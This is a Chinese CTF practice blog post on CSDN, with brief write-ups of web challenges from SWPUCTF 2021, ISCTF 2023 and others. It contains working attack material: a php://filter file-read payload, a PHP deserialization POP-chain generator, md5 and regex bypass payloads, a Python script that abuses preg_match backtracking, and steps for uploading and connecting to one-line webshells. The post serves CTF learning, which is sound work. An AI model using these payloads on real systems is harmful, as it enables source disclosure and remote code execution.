学习记录3

已于 2023-12-16 13:38:47 修改
阅读量85 收藏
点赞数 1
文章标签: 学习
于 2023-12-15 00:10:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80028001/article/details/135005193
版权

[SWPUCTF 2021 新生赛]easy_md5

一道简单的md5题

get传参,post传参,参数值不同而md5值相同时,即获得flag

这题是弱类型比较,“==”为弱相等,此题也可以用0e开头的md5值

[SWPUCTF 2021 新生赛]include

传个"file"参数试试

接下来利用file参数,使用php伪协议,?file=php://filter/read=convert.base64-encode/resource=flag.php 

在上次记录中我们知道payload的内容可获取BASE64形式的flag

filter定义了要用于数据流的过滤器,read=convert.base-encode/resourve=flag.php表示在读取数据流时,将数据转换为 base64 编码,而convert就是将其他形式的数据流转换成字符串的形式。

base64一下即可

[SWPUCTF 2021 新生赛]caidao

显然一句话木马,直接连接然后终端运行 cat /flag

[SWPUCTF 2021 新生赛]Do_you_know_http

关于http的一些问题

 去burp改一下Agent

重定向

本地访问

先写点简单题混混,明天继续写

[第五空间 2021]WebFTP

算是道信息搜集?

看起来是道登录,我一开始想的是爆破,但是爆破时间成本太高,先dirsearch扫描一下看看有什么东西

发现有git泄露和phpfino文件,进入phpfino文件搜索关键字即可

[ISCTF 2023] 圣杯战争

之前做出来的一道反序列化,现在复习一下

直接给了源码,审一下吧

利用点是include

Poc链为summon:_wakeup->artifact:to_string()->prepare:function()->saber:invoke()

<?php
highlight_file(__FILE__);
error_reporting(0);

class artifact{
    public $excalibuer;
    public $arrow;

}

class prepare{
    public $release;
}
class saber{
    public $weapon="php://filter/read=convert.base64-encode/resource=flag.php";
    }
class summon{
    public $Saber;
    }
$a=new summon();
$a->Saber=new artifact();
$a->Saber->excalibuer=new prepare();
$a->Saber->excalibuer->release=new saber();
$a->Saber->excalibuer->release->weapon;
echo urlencode(serialize($a));
?>

之后即可获得flag

[ISCTF 2023] 绕进你的心里

 <?php
highlight_file(__FILE__);
error_reporting(0);
require 'flag.php';
$str = (String)$_POST['pan_gu'];
$num = $_GET['zhurong'];
$lida1 = $_GET['hongmeng'];
$lida2 = $_GET['shennong'];
if($lida1 !== $lida2 && md5($lida1) === md5($lida2)){
    echo "md5绕过了!";
    if(preg_match("/[0-9]/", $num)){
        die('你干嘛?哎哟!');
    }
    elseif(intval($num)){
        if(preg_match('/.+?ISCTF/is', $str)){
            die("再想想!");
        }
        if(stripos($str, '2023ISCTF') === false){
            die("就差一点点啦!");
        }
        echo $flag;
    }
}
?>

 这是源代码,在url中访问需要用&链接多个参数,绕过md5和num的正则都可以用数组

payload:?shennong[]=1&hongmeng[]=2&zhurong[]=1

之后绕过字符串正则,访问超过一百万次后preg_match会返回false

import requests
url="http://gz.imxbt.cn:30490/?shennong[]=1&hongmeng[]=2&zhurong[]=1"
param='very'*250000+"2023ISCTF"
data={
    "pan_gu":param
}
res=requests.post(url,data)
print(res.text)

即可获得Flag

[ISCTF  2023]  where_is_the_flag

这个题就是蚁剑翻目录,有一句话木马,直接链接,得第一部分flag

根目录有两个其他部分

 

[SWPUCTF 2021 新生赛]babyrce

申码,发现要改cookie

访问文件

过滤空格,命令执行,瞅一眼根目录

cat 即可

[SWPUCTF 2021 新生赛]easyupload1.0

写个图片一句话,上传之后burp改包,蚁剑链接

flag.php的flag是假的,不是真的

post一个a在phpinfo看看

escape233
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
H3CSE学习笔记
03-30
H3CSE学习笔记,大规模网络路由技术 详细手册
[SWPUCTF 2021 新生]caidao
rev1ve的博客
03-05 1160
[SWPUCTF 2021 新生]caidao
NSSCTF练习记录:[SWPUCTF 2021 新生]caidao
最新发布
qq_44396970的博客
08-06 342
eval()函数的作用是把括号内的字符串全部当作php代码来执行。文件是连着数据库的,甚至可以直接对文件进行操作。_POST[cmd]变量,变量中储存有用户提交的数据。@符号表示后面的语句即使执行错误,也不报错。图片上给出了代码,是php的一句话木马。直接用hackbar对页面POST参数。标签中的方法,在页面中,所有的。然后左上角就出现flag了。文件返还信息,通常这样的。
NSSCTFweb刷题记录
fivesheeptree的博客
07-12 355
如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。将json参数的值解码为,从而使得$json['x']的值等于"wllm"。通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组。
学习笔记学习笔记学习笔记
01-29
学习笔记学习笔记学习笔记
RRT学习笔记——记录
04-12
RRT学习笔记——记录
学习笔记记录记录记录记录
04-09
学习笔记记录记录记录记录
Java基础 学习笔记 Markdownr版
06-27
学习笔记主要涵盖了Java的基础知识,包括面向对象、集合、IO流、多线程、反射与动态代理以及Java 8的新特性等方面,旨在帮助初学者或有经验的开发者巩固和提升Java编程技能。 1. 面向对象(OOP):Java的核心是...
[SWPUCTF] 2021新生之(NSSCTF)刷题记录
Aluxian_的博客
04-17 2031
[SWPUCTF] 2021新生之(NSSCTF)刷题记录wp
nssctf web 入门(6)
qq_61988806的博客
04-17 1287
这里通过nssctf的题单入门来写,会按照题单详细解释每题。题单在中。想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
[SWPUCTF 2021 新生]caidao(一句话木马+蚁剑)
2401_84499442的博客
07-07 219
第一种方法:直接post传参,首先eval函数是代码执行,那么我们就写入wllm=system('ls /'),查看服务器文件目录。很明显,这里的flag就是我们要找的文件,然后再执行wllm=system('cat /flag'),查看flag文件内容。当然,很明显,这里是一句话木马,那么我们也可以用蚁剑。第一步,因为他已经给出了密码“wllm”,那么我们就直接连接。然后从下往上依次查找文件,最终在/flga中找到flag。
[SWPUCTF 2021 新生]第一波放题(nssctf刷题)
weixin_63231007的博客
04-09 9034
[SWPUCTF 2021 新生]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_decode — 对 JSON 格式的字符串进行编码 说明 mixed json_decode ( string $json [, bool $assoc ] ) 接受一个 JSON 格式的字符串并且把它转换为 PHP 变量 参数 json 待解码的 json string 格式的字符串。 asso
NSSCTF——Web题目1
weixin_54055099的博客
08-25 1315
NSSCTF基础web题目的解题思路
NSSCTF | [SWPUCTF 2021 新生]caidao
2302_80946742的博客
05-13 388
打开题目,只有一个图片,图片中间是一个一句话木马的一部分,意思是服务器可以执行通过POST的请求方式传入参数为wllm的命令,那这就是典型的命令执行,当然,也可以使用蚁剑或者菜刀连接这个木马。使用HackBar传入参数为wllm的ls命令,可以看到左上角有回显,展示了当前目录下的文件,说明命令有用。看不清的话,可以Ctrl+U查看网页源代码。一句话木马的详细介绍可以参考我的这篇文章。然后cat命令查看就能得到flag。这里使用到的工具是HackBar。然后返回根目录看看有什么。可以直接看到flag文件。
NSSCTF刷题笔记web6——[SWPUCTF 2021 新生]caidao
qq_45692883的博客
01-18 603
题目也是非常的简洁明了,考点可能是菜刀的使用,所以稍微绕一下,用菜刀来get shell。直接输入网址以及密码和脚本格式,就可以获取shell。caidao是一款shell管理工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值